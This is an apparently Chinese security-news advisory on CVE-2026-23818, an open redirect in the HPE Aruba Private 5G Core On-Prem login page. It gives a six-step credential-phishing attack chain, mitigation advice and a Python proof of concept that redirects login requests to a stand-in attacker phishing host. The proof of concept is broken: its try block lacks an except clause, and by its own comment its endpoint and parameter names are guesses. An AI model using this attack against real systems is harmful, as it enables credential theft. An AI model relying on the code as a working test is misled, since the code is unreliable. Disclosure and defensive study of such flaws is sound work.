CVE-2026-23818 CVSS 8.8 高危

CVE-2026-23818 HPE Aruba私有5G核心开放重定向漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-23818

漏洞类型

开放重定向

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

HPE Aruba Networking Private 5G Core On-Prem

漏洞概述

HPE Aruba Networking Private 5G Core On-Prem的图形用户界面（GUI）中存在一个开放重定向漏洞。攻击者可以通过构造特制的URL，在登录流程中利用此漏洞。一旦攻击成功，经过身份验证的用户会被重定向到攻击者控制的服务器，该服务器托管着伪造的登录页面。受害者可能会在不知情的情况下输入凭据，导致凭据被窃取，随后被重定向回合法登录页面。

技术细节

该漏洞源于HPE Aruba Networking Private 5G Core On-Prem GUI在处理登录流程时，未对用户提供的重定向URL参数进行严格的验证。攻击者利用这一缺陷，构造包含恶意域名的特制URL（例如将重定向参数指向攻击者服务器）。当受害者（已认证用户）点击此链接时，应用程序会信任该参数并向客户端发送HTTP 302重定向指令，将受害者引导至攻击者控制的钓鱼站点。由于重定向行为发生在合法的登录流程中，受害者往往难以察觉异常。攻击者在伪造页面收集凭证后，再将受害者重定向回真实系统，从而实现隐蔽的凭据窃取。

攻击链分析

STEP 1

1. 准备阶段

攻击者搭建伪造的登录页面，用于收集用户凭据。

STEP 2

2. 构造链接

攻击者分析目标系统登录流程，构造包含恶意重定向参数的特制URL。

STEP 3

3. 社会工程学攻击

攻击者将特制URL发送给目标组织的经过身份验证的用户，诱导其点击。

STEP 4

4. 执行重定向

用户点击链接，目标系统GUI解析参数并将用户浏览器重定向至攻击者的伪造页面。

STEP 5

5. 凭据窃取

受害者在伪造页面输入账号密码，攻击者截获数据。

STEP 6

6. 完成攻击

攻击者将受害者重定向回合法登录页面，维持隐蔽性，随后利用窃取的凭据进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-23818 Open Redirect Vulnerability
# Target: HPE Aruba Networking Private 5G Core On-Prem

import requests

def check_open_redirect(target_base_url, malicious_redirect_url):
    """
    Tests if the login endpoint accepts arbitrary redirect URLs.
    """
    # Vulnerable endpoint assumption based on description
    login_endpoint = f"{target_base_url}/login"
    
    # Payload attempting to redirect to an external attacker-controlled server
    params = {
        "redirect": malicious_redirect_url,
        "next": malicious_redirect_url  # Common parameter name for redirects
    }
    
    try:
        print(f"[*] Sending request to: {login_endpoint}")
        response = requests.get(login_endpoint, params=params, allow_redirects=False)
        
        # Check if the response contains a 302/301 Redirect location
        if response.status_code in [301, 302, 303, 307, 308]:
            location = response.headers.get('Location')
            if malicious_redirect_url in location:
                print(f"[!] Vulnerability Confirmed! Redirecting to: {location}")
                return True
        
        print("[*] No open redirect detected or parameter name is different.")
        return False

if __name__ == "__main__":
    target = "https://<target-ip>:<port>"
    evil_site = "http://attacker-controlled-server.com/fake-login"
    check_open_redirect(target, evil_site)

影响范围

HPE Aruba Networking Private 5G Core On-Prem (具体受影响版本请参考HPE官方公告 hpesbnw05032en_us)

防御指南

临时缓解措施

在未应用补丁前，建议用户提高警惕，不要点击来源不明的链接，在输入敏感凭据前务必核对浏览器地址栏的URL是否为官方合法地址。管理员可暂时限制对GUI管理界面的外部网络访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表